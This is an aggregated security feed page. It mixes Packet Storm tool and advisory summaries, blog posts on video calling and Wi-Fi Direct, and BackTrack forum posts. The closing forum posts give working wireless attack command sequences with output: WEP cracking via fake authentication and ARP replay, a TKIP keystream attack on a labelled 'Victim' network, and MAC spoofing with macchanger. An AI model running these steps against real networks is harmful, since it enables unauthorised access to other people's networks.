16:39
»
Packet Storm Security Recent Files
Monocle is a local network host discovery tool. In passive mode, it will listen for ARP request and reply packets. In active mode, it will send ARP requests to the specific IP range. The results are a list of IP and MAC addresses present on the local network. Written to work on both Linux and FreeBSD.
-
16:39
»
Packet Storm Security Tools
Monocle is a local network host discovery tool. In passive mode, it will listen for ARP request and reply packets. In active mode, it will send ARP requests to the specific IP range. The results are a list of IP and MAC addresses present on the local network. Written to work on both Linux and FreeBSD.
-
16:39
»
Packet Storm Security Misc. Files
Monocle is a local network host discovery tool. In passive mode, it will listen for ARP request and reply packets. In active mode, it will send ARP requests to the specific IP range. The results are a list of IP and MAC addresses present on the local network. Written to work on both Linux and FreeBSD.
-
-
11:05
»
Packet Storm Security Advisories
PRE-CERT Security Advisory - Both the 2.4 and 2.6 Linux kernels have multiple vulnerabilities. A buffer overflow bug in mac_partition in fs/partitions/mac.c (for MAC partition tables) allows for a denial-of-service (kernel panic) condition via a corrupted MAC partition table. A division-by-zero bug in ldm_get_vblks in fs/partitions/ldm.c (for LDM partition tables) allows a denial-of-service (kernel oops) condition via a corrupted LDM partition table. A buffer overflow bug in ldm_frag_add in fs/partitions/ldm.c (for LDM partition tables) may allow escalation of privileges or disclosure of sensitive information via a corrupted LDM partition table.
-
11:05
»
Packet Storm Security Recent Files
PRE-CERT Security Advisory - Both the 2.4 and 2.6 Linux kernels have multiple vulnerabilities. A buffer overflow bug in mac_partition in fs/partitions/mac.c (for MAC partition tables) allows for a denial-of-service (kernel panic) condition via a corrupted MAC partition table. A division-by-zero bug in ldm_get_vblks in fs/partitions/ldm.c (for LDM partition tables) allows a denial-of-service (kernel oops) condition via a corrupted LDM partition table. A buffer overflow bug in ldm_frag_add in fs/partitions/ldm.c (for LDM partition tables) may allow escalation of privileges or disclosure of sensitive information via a corrupted LDM partition table.
-
11:05
»
Packet Storm Security Misc. Files
PRE-CERT Security Advisory - Both the 2.4 and 2.6 Linux kernels have multiple vulnerabilities. A buffer overflow bug in mac_partition in fs/partitions/mac.c (for MAC partition tables) allows for a denial-of-service (kernel panic) condition via a corrupted MAC partition table. A division-by-zero bug in ldm_get_vblks in fs/partitions/ldm.c (for LDM partition tables) allows a denial-of-service (kernel oops) condition via a corrupted LDM partition table. A buffer overflow bug in ldm_frag_add in fs/partitions/ldm.c (for LDM partition tables) may allow escalation of privileges or disclosure of sensitive information via a corrupted LDM partition table.
-
-
11:11
»
Packet Storm Security Recent Files
Mpctp is a tool for manipulation of raw packets that allows a large number of options. Its primary purpose is to diagnose and test several scenarios that involving the use of the types of TCP/IP packets. It is able to send certain types of packets to any specific target and manipulations of various fields at runtime. These fields can be modified in its structure as the the Source/Destination IP address and Source/Destination MAC address.
-
11:11
»
Packet Storm Security Tools
Mpctp is a tool for manipulation of raw packets that allows a large number of options. Its primary purpose is to diagnose and test several scenarios that involving the use of the types of TCP/IP packets. It is able to send certain types of packets to any specific target and manipulations of various fields at runtime. These fields can be modified in its structure as the the Source/Destination IP address and Source/Destination MAC address.
-
11:11
»
Packet Storm Security Misc. Files
Mpctp is a tool for manipulation of raw packets that allows a large number of options. Its primary purpose is to diagnose and test several scenarios that involving the use of the types of TCP/IP packets. It is able to send certain types of packets to any specific target and manipulations of various fields at runtime. These fields can be modified in its structure as the the Source/Destination IP address and Source/Destination MAC address.
-
-
0:01
»
Packet Storm Security Tools
Mpctp is a tool for manipulation of raw packets that allows a large number of options. Its primary purpose is to diagnose and test several scenarios that involving the use of the types of TCP/IP packets. It is able to send certain types of packets to any specific target and manipulations of various fields at runtime. These fields can be modified in its structure as the the Source/Destination IP address and Source/Destination MAC address.
-
0:01
»
Packet Storm Security Misc. Files
Mpctp is a tool for manipulation of raw packets that allows a large number of options. Its primary purpose is to diagnose and test several scenarios that involving the use of the types of TCP/IP packets. It is able to send certain types of packets to any specific target and manipulations of various fields at runtime. These fields can be modified in its structure as the the Source/Destination IP address and Source/Destination MAC address.
-
-
17:18
»
Packet Storm Security Recent Files
Huawei HG520 and HG530 routers are vulnerable to weak cipher attacks. It is possible to generate the default WEP/WPA key from the MAC address. This python code demonstrates the issue.
-
17:18
»
Packet Storm Security Misc. Files
Huawei HG520 and HG530 routers are vulnerable to weak cipher attacks. It is possible to generate the default WEP/WPA key from the MAC address. This python code demonstrates the issue.
-
7:59
»
Packet Storm Security Recent Files
Kismet is an 802.11 layer 2 wireless network sniffer. It can sniff 802.11b, 802.11a, and 802.11g traffic. It is capable of sniffing using almost any wireless card supported in Linux, which currently divide into cards handled by libpcap and the Linux-Wireless extensions (such as Cisco Aironet), and cards supported by the Wlan-NG project which use the Prism/2 chipset (such as Linksys, Dlink, and Zoom). Besides Linux, Kismet also supports FreeBSD, OpenBSD and Mac OS X systems. Features Multiple packet capture sources, Runtime network sorting by AP MAC address (bssid), IP block detection via ARP and DHCP packet dissection, Cisco product detection via CDP, Ethereal and tcpdump compatible file logging, Airsnort-compatible "interesting" (cryptographically weak) logging, Secure SUID behavior, GPS devices and wireless devices fingerprinting. Kismet also includes a tool called gpsmap that can be used to create maps from logged GPS data.
-
7:59
»
Packet Storm Security Tools
Kismet is an 802.11 layer 2 wireless network sniffer. It can sniff 802.11b, 802.11a, and 802.11g traffic. It is capable of sniffing using almost any wireless card supported in Linux, which currently divide into cards handled by libpcap and the Linux-Wireless extensions (such as Cisco Aironet), and cards supported by the Wlan-NG project which use the Prism/2 chipset (such as Linksys, Dlink, and Zoom). Besides Linux, Kismet also supports FreeBSD, OpenBSD and Mac OS X systems. Features Multiple packet capture sources, Runtime network sorting by AP MAC address (bssid), IP block detection via ARP and DHCP packet dissection, Cisco product detection via CDP, Ethereal and tcpdump compatible file logging, Airsnort-compatible "interesting" (cryptographically weak) logging, Secure SUID behavior, GPS devices and wireless devices fingerprinting. Kismet also includes a tool called gpsmap that can be used to create maps from logged GPS data.
-
7:59
»
Packet Storm Security Misc. Files
Kismet is an 802.11 layer 2 wireless network sniffer. It can sniff 802.11b, 802.11a, and 802.11g traffic. It is capable of sniffing using almost any wireless card supported in Linux, which currently divide into cards handled by libpcap and the Linux-Wireless extensions (such as Cisco Aironet), and cards supported by the Wlan-NG project which use the Prism/2 chipset (such as Linksys, Dlink, and Zoom). Besides Linux, Kismet also supports FreeBSD, OpenBSD and Mac OS X systems. Features Multiple packet capture sources, Runtime network sorting by AP MAC address (bssid), IP block detection via ARP and DHCP packet dissection, Cisco product detection via CDP, Ethereal and tcpdump compatible file logging, Airsnort-compatible "interesting" (cryptographically weak) logging, Secure SUID behavior, GPS devices and wireless devices fingerprinting. Kismet also includes a tool called gpsmap that can be used to create maps from logged GPS data.
-
-
9:10
»
Packet Storm Security Exploits
Remote attackers can gain sensitive information about a DD-WRT router and internal clients, including IP addresses, MAC addresses and host names. This information can be used for further network attacks as well as very accurate geolocation. This is exploitable even if remote administration is disabled. Version 24-preSP2 is affected.
-
9:10
»
Packet Storm Security Recent Files
Remote attackers can gain sensitive information about a DD-WRT router and internal clients, including IP addresses, MAC addresses and host names. This information can be used for further network attacks as well as very accurate geolocation. This is exploitable even if remote administration is disabled. Version 24-preSP2 is affected.
-
9:10
»
Packet Storm Security Misc. Files
Remote attackers can gain sensitive information about a DD-WRT router and internal clients, including IP addresses, MAC addresses and host names. This information can be used for further network attacks as well as very accurate geolocation. This is exploitable even if remote administration is disabled. Version 24-preSP2 is affected.
-
-
15:22
»
Wirevolution
Although phone numbers are an antiquated kind of thing, we are sufficiently beaten down by the machines that we think of it as natural to identify a person by a 10 digit number. Maybe the demise of the numeric phone keypad as big touch-screens take over will change matters on this front. But meanwhile, phone numbers are holding us back in important ways. Because phone numbers are bound to the PSTN, which doesn’t carry video calls, it is harder to make video calls than voice, because we don’t have people’s video addresses so handy.
This year, three new products attempted to address this issue in remarkably similar ways – clearly an idea whose time has come. The products are Apple’s FaceTime, Cisco’s IME and a startup product called Tango.
In all three of these products, you make a call to a regular phone number, which triggers a video session over the Internet. You only need the phone number – the Internet addressing is handled automatically. The two problems the automatic addressing has to handle are finding a candidate address, then verifying that it is the right one. Here’s how each of those three new products does the job:
1. FaceTime. When you first start FaceTime, it sends an SMS (text message) to an Apple server. The SMS contains sufficient information for the Apple server to reliably associate your phone number with the XMPP (push services) client running on your iPhone. With this authentication performed, anybody else who has your phone number in their address book on their iPhone or Mac can place a videophone call to you via FaceTime.
2. Cisco IME (Inter-Company Media Engine). The protocol used by IME to securely associate your phone number with your IP address is ViPR (Verification Involving PSTN Reachability), an open protocol specified in several IETF drafts co-authored by Jonathan Rosenberg who is now at Skype. ViPR can be embodied in a network box like IME, or in an endpoint like a phone of PC.
Here’s how it works: you make a phone call in the usual way. After you hang up, ViPR looks up the phone number you called to see if it is also ViPR-enabled. If it is, ViPR performs a secure mutual verification, by using proof-of-knowledge of the previous PSTN call as a shared secret. The next time you dial that phone number, ViPR makes the call through the Internet rather than through the phone network, so you can do wideband audio and video with no per-minute charge. A major difference between ViPR and FaceTime or Tango is that ViPR does not have a central registration server. The directory that ViPR looks up phone numbers in is stored in a distributed hash table (DHT). This is basically a distributed database with the contents stored across the network. Each ViPR participant contributes a little bit of storage to the network. The DHT itself defines an algorithm – called Chord – which describes how each node connects to other nodes, and how to look up information.
3. Tango, like FaceTime, has its own registration servers. The authentication on these works slightly differently. When you register with Tango, it looks in the address book on your iPhone for other registered Tango users, and displays them in your Tango address book. So if you already know somebody’s phone number, and that person is a registered Tango user, Tango lets you call them in video over the Internet.
-
-
13:00
»
Hack a Day
[Sprite_TM] cooked up an amazing hack by resurrecting a Mac SE using a Dockstar and ARM processor. The retro hardware had a bad mainboard thanks to the corrosive properties of a failed backup-battery. He had been wanting to do something with the Seagate Dockstar and decided it would find a nice home in the Mac. [...]
-
-
12:00
»
Hack a Day
Evil Mad Scientist Laboratories is preparing for Halloween with this standby-mode pumpkin. Inside there’s an LED plugging a hole that is drilled just to the skin of the gourd-like vegetable. It fades in and out similar to a sleeping Mac, using what we think is a vastly over-powered circuit based on an ATtiny2313 (1k of [...]
-
-
5:34
»
Hack a Day
[Enigma-penguin] built a tablet computer out of a Core2Duo Macbook circa 2007. The battery exploded, damaging the case and a few components inside. But there was hope for a new life as a tablet computer. He removed the screen and tested to make sure the computer would still function without it by using the video [...]
-
-
13:45
»
remote-exploit & backtrack
Hello, friends.
Do you know about any manner to increase the (allways short: 10 or so) number of Static DHCP List that routers use to have?
I am talking about the IP assignement that a certain MAC connecting to the local network will have.
Thanks :).
-
-
13:01
»
Packet Storm Security Tools
NMB Scanner scans the shares of a SMB network, using the NMB and SMB protocols. It is useful for acquiring information on a local area network for such purposes as security auditing. It can obtain such information as NMB/SMB/Windows hostname, IP address, IP hostname, ethernet MAC address, Windows username, NMB/SMB/Windows domain name, and master browser. It can discover all the NMB/SMB/Windows hosts on a local area network by using the hosts lists maintained by master browsers.
-
13:01
»
Packet Storm Security Recent Files
NMB Scanner scans the shares of a SMB network, using the NMB and SMB protocols. It is useful for acquiring information on a local area network for such purposes as security auditing. It can obtain such information as NMB/SMB/Windows hostname, IP address, IP hostname, ethernet MAC address, Windows username, NMB/SMB/Windows domain name, and master browser. It can discover all the NMB/SMB/Windows hosts on a local area network by using the hosts lists maintained by master browsers.
-
-
17:29
»
Packet Storm Security Advisories
Mandriva Linux Security Advisory 2010-156 - The FT_Stream_EnterFrame function in base/ftstream.c in FreeType before 2.4.2 does not properly validate certain position values, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted font file. Array index error in the t42_parse_sfnts function in type42/t42parse.c in FreeType before 2.4.2 allows remote attackers to cause a denial of service or possibly execute arbitrary code via negative size values for certain strings in FontType42 font files, leading to a heap-based buffer overflow. FreeType before 2.4.2 uses incorrect integer data types during bounds checking, which allows remote attackers to cause a denial of service or possibly execute arbitrary code via a crafted font file. Buffer overflow in the Mac_Read_POST_Resource function in base/ftobjs.c in FreeType before 2.4.2 allows remote attackers to cause a denial of service or possibly execute arbitrary code via a crafted Adobe Type 1 Mac Font File font. bdf/bdflib.c in FreeType before 2.4.2 allows remote attackers to cause a denial of service via a crafted BDF font file, related to an attempted modification of a value in a static string. Unspecified vulnerability in FreeType 2.3.9, and other versions before 2.4.2, allows remote attackers to cause a denial of service via vectors involving nested Standard Encoding Accented Character calls, related to psaux.h, cffgload.c, cffgload.h, and t1decode.c.
-
17:29
»
Packet Storm Security Advisories
Mandriva Linux Security Advisory 2010-157 - The FT_Stream_EnterFrame function in base/ftstream.c in FreeType before 2.4.2 does not properly validate certain position values, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted font file. Array index error in the t42_parse_sfnts function in type42/t42parse.c in FreeType before 2.4.2 allows remote attackers to cause a denial of service or possibly execute arbitrary code via negative size values for certain strings in FontType42 font files, leading to a heap-based buffer overflow. FreeType before 2.4.2 uses incorrect integer data types during bounds checking, which allows remote attackers to cause a denial of service or possibly execute arbitrary code via a crafted font file. Buffer overflow in the Mac_Read_POST_Resource function in base/ftobjs.c in FreeType before 2.4.2 allows remote attackers to cause a denial of service or possibly execute arbitrary code via a crafted Adobe Type 1 Mac Font File font. bdf/bdflib.c in FreeType before 2.4.2 allows remote attackers to cause a denial of service via a crafted BDF font file, related to an attempted modification of a value in a static string. The updated packages have been patched to correct these issues.
-
-
19:03
»
Packet Storm Security Tools
Harald Scan is a Bluetooth discovery scanner. It determines Major and Minor device classes according to the Bluetooth SIG specification and attempts to resolve a device's MAC address to the largest known vendor/MAC address list. Written in Python. This is the Linux 64bit binary release.
-
19:03
»
Packet Storm Security Tools
Harald Scan is a Bluetooth discovery scanner. It determines Major and Minor device classes according to the Bluetooth SIG specification and attempts to resolve a device's MAC address to the largest known vendor/MAC address list. Written in Python. This is the Linux 32bit binary release.
-
19:03
»
Packet Storm Security Tools
Harald Scan is a Bluetooth discovery scanner. It determines Major and Minor device classes according to the Bluetooth SIG specification and attempts to resolve a device's MAC address to the largest known vendor/MAC address list. Written in Python. This is the Mac OSX source release.
-
19:03
»
Packet Storm Security Recent Files
Harald Scan is a Bluetooth discovery scanner. It determines Major and Minor device classes according to the Bluetooth SIG specification and attempts to resolve a device's MAC address to the largest known vendor/MAC address list. Written in Python. This is the Linux 64bit binary release.
-
19:03
»
Packet Storm Security Recent Files
Harald Scan is a Bluetooth discovery scanner. It determines Major and Minor device classes according to the Bluetooth SIG specification and attempts to resolve a device's MAC address to the largest known vendor/MAC address list. Written in Python. This is the Linux 32bit binary release.
-
19:02
»
Packet Storm Security Recent Files
Harald Scan is a Bluetooth discovery scanner. It determines Major and Minor device classes according to the Bluetooth SIG specification and attempts to resolve a device's MAC address to the largest known vendor/MAC address list. Written in Python. This is the Mac OSX source release.
-
-
22:51
»
Packet Storm Security Tools
Kismet is an 802.11 layer 2 wireless network sniffer. It can sniff 802.11b, 802.11a, and 802.11g traffic. It is capable of sniffing using almost any wireless card supported in Linux, which currently divide into cards handled by libpcap and the Linux-Wireless extensions (such as Cisco Aironet), and cards supported by the Wlan-NG project which use the Prism/2 chipset (such as Linksys, Dlink, and Zoom). Besides Linux, Kismet also supports FreeBSD, OpenBSD and Mac OS X systems. Features Multiple packet capture sources, Runtime network sorting by AP MAC address (bssid), IP block detection via ARP and DHCP packet dissection, Cisco product detection via CDP, Ethereal and tcpdump compatible file logging, Airsnort-compatible interesting (cryptographically weak) logging, Secure SUID behavior, GPS devices and wireless devices fingerprinting. Kismet also includes a tool called gpsmap that can be used to create maps from logged GPS data.
-
18:35
»
SecuriTeam
A Denial of Service vulnerability was discovered in Skype for Mac.
-
Make your website safer. Use external penetration testing service. First report ready in one hour!
-
-
18:24
»
Wirevolution
A while back the Wi-Fi Alliance announced a new certification program, Wi-Fi Direct, which enables a PC to connect directly with other Wi-Fi devices without having to go through an Access Point.
The Wi-Fi certification process for Wi-Fi Direct is scheduled to be launched by the end of 2010, but there are already two pre-standard implementations of this concept, My Wi-Fi, an Intel product which ships in Centrino 2 systems, and Wireless Hosted Network which ships in all versions of Windows 7.
The Wi-Fi Direct driver makes a single Wi-Fi adapter on the PC look like two to the operating system: one ordinary one that associates with a regular Access Point, and a second acting as a “Virtual Access Point.” The virtual access point (Microsoft calls it a “SoftAP”) actually runs inside the Wi-Fi driver on the PC (labeled WPAN I/F in the Intel diagram below).
To the outside world the Wi-Fi adapter also looks like two devices, each with its own MAC address: one the PC just like without Wi-Fi Direct, and the other an access point. Devices that associate with that access point join the PC’s PAN (Personal Area Network).
This yields several benefits in various use cases.
I wrote a couple of years ago about how a company called Ozmo planned to use a Wi-Fi PAN to connect peripherals to PCs, replacing Bluetooth and proprietary wireless technologies. That plan has now come to fruition. Earlier this month Ozmo announced that it had received $10.8 million in additional funding, and this week it announced two major customers: Primax, a leading ODM of wireless mice, and NMB Technologies, a leading ODM of wireless keyboards.
Here’s a slide from one of their promotional presentations giving a comparison with Bluetooth and proprietary technologies:
The essence of Ozmo’s approach is low cost, multi-device, low bandwidth and low power consumption. Wi-Fi Direct has another use case that is high bandwidth, with no requirement for low power.
If you want to stream video from your PC to a monitor using traditional Wi-Fi (“infrastructure mode”) each packet goes from the PC to the access point, then from the access point to the TV, so it occupies the spectrum twice for each packet. Wi-Fi Direct effectively doubles the available throughput, since each packet flies through the ether only once, directly from the PC to the TV. But it actually does better than that. Supposing the PC and the TV are in the same room, but the access point is in a different room, the PC can transmit at much lower power. Another similar Wi-Fi Direct session can then happen in another room in the house. Without Wi-Fi direct the two sessions would have to share the access point, taking turns to use the spectrum. So we get increased aggregate throughput both from halving the number of packet transmissions, and from allowing simultaneous use of the spectrum by multiple sessions (if they are far enough apart).
A Wi-Fi buff would point out that you can already do all this with ad-hoc mode, but Wi-Fi Direct purports to be usable by mortals, and to work interoperably, neither of which could be said for ad-hoc mode until recently. In January Infinitec announced a new point-to-point video streaming product that claims to be easy to use and universally interoperable, that Engadget implies uses ad-hoc mode, though Google can’t find the words “ad hoc” on the Infinitec website.
Between the bandwidth extremes of mice and TVs, lie numerous other potential uses, like headsets (which Ozmo also supports); syncing phones, cameras and media players; and wireless printers.
-
-
9:04
»
Packet Storm Security Exploits
This Metasploit module exploits a stack buffer overflow vulnerability in the handling of the TextBytesAtom records by Microsoft PowerPoint Viewer. According to Microsoft, the PowerPoint Viewer distributed with Office 2003 SP3 and earlier, as well as Office 2004 for Mac, are vulnerable. NOTE: The vulnerable code path is not reachable on versions of Windows prior to Windows Vista.
-
-
0:33
»
remote-exploit & backtrack
Bonjour a tous,:D
J'ai suivi pleins de post afin de craquer ma clé WEP, je suis parvenus à trouver la clé de ma livebox (merci a tout ceux qui on fais de nombreux post), mais ensuite je n'arrive pas a trouver sous Backtrack la façon de se connecté a Internet. Je n'ai pas essayé sous Windows (puisque sous Backtrack j'ai fait un macchanger) pour pouvoir récupérer la clé.
Je suppose que sous windows il va prendre m'a vrais mac et qu'il va me jeter puisque je n'ai pas la bonne mac. Maintenant vous allez me dire "essaye avant de poster", mais comme il était prêt de trois heures ce matin et qu'il fallait assurer au taf, je n'ai pas pris le temps de faire l'essai. Et en plus j'aime bien comprendre comment tous cela fonctionne.
Merci à vous pour vos réponses.
-
-
2:03
»
remote-exploit & backtrack
Hi guys.
I'll try to be thorough.
Following the recommendations of many posters here, I recently acquired an ALFA AWUS036H (rtl8187 driver) and am trying to break into my (own: I do not endorse illegal activity in any way) WEP-enabled router.
I am not in the habit of posting in forums for basic inquiries (as most information is on Google these days if one searches enough), but I find myself in need of assistance.
I am running BackTrack 4 final (released 11.01.2010) and issuing the following commands:
Code:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airodump-ng --channel <X> --bssid <XXXX...> -w <path> wlan0
aireplay-ng -1 0 -e <XXXX...> -a <XXXX...> -h <XXXX...> wlan0
Filling in the stuff in <>, naturally.
However I fail to get the association succeded :-) message.
On the contrary, I get DeAuth'ed and I can't seem to understand why.
(In fact, it loops on:
Code:
Sending Authentication Request
Authentication successful
Sending Association Request
sometimes with [ACK], and sometimes with a "received a deauth packet!")
The aireplay-ng --test succeeds with 30/30 and I've tried the fake auth at various places around the house, with the same result. I've also disabled MAC filtering and tried variations of the aireplay-ng -1, such as the more detailed -1 attack on the aircrack wiki, and with -x 180 to limit packets, but to no avail.
The Association Succeeded :-) message has appeared briefly once however, after I macchanged my wlan0 to one of the connected PC's. The #/s rating jumped, and the ARP attack looked like it was working. I wasn't using keep-alive though and eventually got deauthed, and using the same mac address spoof associated no longer thereafter (rather, it gets deauth packets like mad).
I've read around and some other people have had similar problems, though I couldn't find a clear solution. If the answer to this has been posted elsewhere and I've missed it in my search, could someone please point me to it? Any help is appreciated.
-
-
13:11
»
remote-exploit & backtrack
I tried to crack a WEP network with BackTrack4 and my VAIO Z laptop.
My wireless card was:
Code:
root@bt:~# airmon-ng
Interface Chipset Driver
wlan0 Intel 4965/5xxx iwlagn - [phy0]
I changed it to monitor mode:
Code:
root@bt:~# airmon-ng start wlan0 6
Interface Chipset Driver
wlan0 Intel 4965/5xxx iwlagn - [phy0]
(monitor mode enabled on mon0)
And then I test injection:
Code:
root@bt:~# aireplay-ng -9 mon0
20:59:17 Trying broadcast probe requests...
20:59:17 Injection is working!
20:59:19 Found 1 AP
20:59:19 Trying directed probe requests...
20:59:19 00:23:F8:84:31:1B - channel: 6 - 'Shatel'
20:59:21 Ping (min/avg/max): 1.436ms/3.492ms/7.525ms Power: -57.70
20:59:21 30/30: 100%
Then I started collecting IVs:
Code:
root@bt:~# airodump-ng -c 6 --bssid 00:23:F8:84:31:1B -w output mon0
CH 6 ][ BAT: 21 mins ][ Elapsed: 15 mins ][ 2010-03-11 20:51
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:23:F8:84:31:1B -21 100 8943 178 0 6 54 WEP WEP OPN Shatel
BSSID STATION PWR Rate Lost Packets Probes
00:23:F8:84:31:1B 00:24:D6:11:62:18 0 0 - 1 0 411384
And then I made a fake authentication:
Code:
root@bt:~# macchanger -s mon0
Current MAC: 00:24:d6:11:62:18 (unknown)
root@bt:~# aireplay-ng -1 6000 -o 1 -q 10 -e Shatel -a 00:23:F8:84:31:1B -h 00:24:D6:11:62:18 mon0
21:17:45 Waiting for beacon frame (BSSID: 00:23:F8:84:31:1B) on channel 6
21:17:45 Sending Authentication Request (Open System) [ACK]
21:17:45 Authentication successful
21:17:45 Sending Association Request [ACK]
21:17:45 Association successful :-) (AID: 1)
21:17:55 Sending keep-alive packet
And finally I started injection:
Code:
root@bt:~# aireplay-ng -3 -b 00:23:F8:84:31:1B -h 00:24:d6:11:62:18 mon0
20:36:51 Waiting for beacon frame (BSSID: 00:23:F8:84:31:1B) on channel 6
Saving ARP requests in replay_arp-0311-203651.cap
You should also start airodump-ng to capture replies.
Read 10150 packets (got 45 ARP requests and 2 ACKs), sent 424647 packets...(500 pps)
But injection didn't make any change in the speed of collecting packets(#/s).
I did this again:
Code:
root@bt:~# aireplay-ng -9 mon0
21:22:49 Trying broadcast probe requests...
21:22:51 No Answer...
21:22:51 Found 3 APs
21:22:51 Trying directed probe requests...
21:22:51 00:27:19:D8:B0:C2 - channel: 6 - 'TP-LINK_D8B0C2'
21:22:57 0/30: 0%
21:22:57 00:23:F8:84:31:1B - channel: 6 - 'Shatel'
21:23:03 0/30: 0%
21:23:03 00:80:48:3D:12:27 - channel: 6 - 'mecom.wifi.BG'
21:23:09 0/30: 0%
and it seems that injection is not working!
What should I do?! How can I collects IVs faster?!(now, it takes days[or weeks!] to collect enough packets!)
Thanks!
-
-
15:05
»
remote-exploit & backtrack
so that my computer as for my mac address does not appear on the routers DHCP table or any other data logs.
Thanks in advance.
-
5:54
»
remote-exploit & backtrack
Run TKIP keystream discovery attack:
root@bt:~# tkiptun-ng -a 00:18:39:D3:FB:A0 -h 00:1E:65:F8:BA:A8 -m 80 -n 100 wlan0
Blub 2:38 E6 38 1C 24 15 1C CF
Blub 1:17 DD 0D 69 1D C3 1F EE
Blub 3:29 31 79 E7 E6 CF 8D 5E
08:24:01 Michael Test: Successful
08:24:01 Waiting for beacon frame (BSSID: 00:18:39:D3:FB:A0) on channel 2
08:24:01 Found specified AP
08:24:01 WPA handshake: 00:18:39:D3:FB:A0 captured65:F8:BA:A8] [ 6| 3 ACKs]
08:24:01 Sending 4 directed DeAuth. STMAC: [00:1E:65:F8:BA:A8] [ 9| 6 ACKs]
08:24:02 Waiting for an ARP packet coming from the Client...
Saving chosen packet in replay_src-0329-082409.cap
08:24:09 Waiting for an ARP response packet coming from the AP...
Saving chosen packet in replay_src-0329-082409.cap
08:24:09 Got the answer!
08:24:09 Waiting 10 seconds to let encrypted EAPOL frames pass without interfering.
08:24:31 Offset 81 ( 0% done) | xor = 49 | pt = 40 | 122 frames written in 100055ms
08:25:47 Offset 80 ( 2% done) | xor = 8B | pt = 2A | 155 frames written in 127108ms
08:27:03 Offset 79 ( 4% done) | xor = 39 | pt = 01 | 163 frames written in 133657ms
08:28:18 Offset 78 ( 7% done) | xor = 03 | pt = F4 | 144 frames written in 118079ms
08:29:34 Offset 77 ( 9% done) | xor = EF | pt = 6F | 157 frames written in 128742ms
08:30:42 Offset 76 (11% done) | xor = 76 | pt = 95 | 75 frames written in 61500ms
08:32:01 Offset 75 (14% done) | xor = BA | pt = 67 | 187 frames written in 153338ms
08:33:06 Offset 74 (16% done) | xor = 03 | pt = 14 | 54 frames written in 44279ms
08:34:25 Offset 73 (19% done) | xor = 02 | pt = A4 | 190 frames written in 155801ms
08:35:32 Offset 72 (21% done) | xor = F0 | pt = 3F | 67 frames written in 54943ms
08:36:52 Offset 71 (23% done) | xor = D5 | pt = 93 | 193 frames written in 158255ms
08:38:15 Offset 70 (26% done) | xor = 7D | pt = 1D | 230 frames written in 188622ms
Sleeping for 60 seconds.36 bytes still unknown
ARP Reply
Checking 192.168.x.y
08:38:15 Reversed MIC Key (FromDS): D6:16:91:B7:23:03:E4:25
Saving plaintext in replay_dec-0329-083815.cap
Saving keystream in replay_dec-0329-083815.xor
08:38:15
Completed in 836s (0.05 bytes/s)
08:38:15 AP MAC: 00:18:39:D3:FB:9E IP: 192.168.0.1
08:38:15 Client MAC: 00:1E:65:F8:BA:A8 IP: 192.168.0.103
08:38:15 Sent encrypted tkip ARP request to the client.
08:38:15 Wait for the mic countermeasure timeout of 60 seconds.
Looks like mic failure report was not detected.Waiting 60 seconds before trying again to avoid the AP shutting down.
Looks like mic failure report was not detected.Waiting 60 seconds before trying again to avoid the AP shutting down.
Looks like mic failure report was not detected.Waiting 60 seconds before trying again to avoid the AP shutting down.
Looks like mic failure report was not detected.Waiting 60 seconds before trying again to avoid the AP shutting down.
Sent 1172 packets, current guess: 8F...
Failure: got several deauthentication packets from the AP - you need to start the whole process all over again, as the client got disconnected.
root@bt:~#
Conclusions:
1. Win7/WinXP wpa supplicant ignore AP key renewal timeout and never perform rekeying
2. It pertain to WM6.0/6.1 with HP iPAQ614C anf HTC Touch viva T2223 smartphones
3. Linux wpa supplicants perform key renewal according AP settings.
-
5:51
»
remote-exploit & backtrack
Victim:
Model: HP 6310b
CPU: Intel(R) Core(TM) Duo CPU P8700 2.53GHz
Memory: 4GB
OS: Windows 7
Wireless Interface: Intel(R) WiFi Link 5100 AGN
WiFi security:WPA2/WPA-Enterprise with EAP-TLS(Smartcard or certificate) authentication, TKIP encryption
MAC address: 00:1E:65:F8:BA:A8
Attacker:
Model: Dell Optiplex GX270
CPU: Intel Pentium 4 2.60 GHz
Memory: 1GB
OS: BT4F
Wireless Card: Alfa AWUS360H with 7dB omnidirectional antenna
AP:
Model: Linksys WRT54GL v1.1
Firmware: v4.30.11, Aug. 17, 2007
Wireless security and settings: WPA2-Enterprise, AES+TKIP encryption, QoS/WMM, Key Renewal Interval=900s
BSSID: 00:18:39:D3:FB:A0
Radius server: FreeRADIUS-2.0.2, EAP-TLS authentication with X.509 certificates and DH key exchange
Run airodump-ng for WPA:
root@bt:~# airodump-ng -c 2 -w dump wlan2
CH 2 ][ Elapsed: 16 s ][ 2010-03-29 08:10 ][ WPA handshake: 00:18:39:D3:FB:A0
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:39:D3:FB:A0 -44 100 158 202 3 2 54e. WPA TKIP MGT cuckoo
00:1F:33:FF:39:52 -77 0 154 0 0 2 54e. OPN NETGEAR
BSSID STATION PWR Rate Lost Packets Probes
00:18:39:D3:FB:A0 00:1E:65:F8:BA:A8 -30 54e-54e 1 143
00:1F:33:FF:39:52 00:12:F0:8A:7C:B1 -36 0 - 1 101 125
^C
root@bt:~#
Run airodump-ng for WPA2:
root@bt:~# airodump-ng -c 2 -w dump wlan2
CH 2 ][ Elapsed: 3 mins ][ 2010-03-29 08:24 ][ WPA handshake: 00:18:39:D3:FB:A0
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:39:D3:FB:A0 -40 100 1887 4249 0 2 54e. WPA2 CCMP MGT cuckoo
00:1F:33:FF:39:52 -72 0 1833 0 0 2 54e. OPN NETGEAR
00:1E:65:F8:BA:A8 -37 0 0 0 0 113 -1 <length: 0>
BSSID STATION PWR Rate Lost Packets Probes
(not associated) 00:24:8C:57:8F:D3 -68 0 - 2 0 8
00:18:39:D3:FB:A0 00:1E:65:F8:BA:A8 -29 54e-54e 0 4287 cuckoo
00:1F:33:FF:39:52 00:18:39:D3:FB:A0 -36 1e- 1 0 8
00:1F:33:FF:39:52 00:12:F0:8A:7C:B1 -37 0 - 1 159 1028
^C
Change attacker's MAC address:
root@bt:~# ifconfig wlan0 down
root@bt:~# macchanger --mac 00:1E:65:F8:BA:A8 wlan0
Current MAC: 00:c0:ca:1b:f8:b7 (Alfa, Inc.)
Faked MAC: 00:1e:65:f8:ba:a8 (unknown)
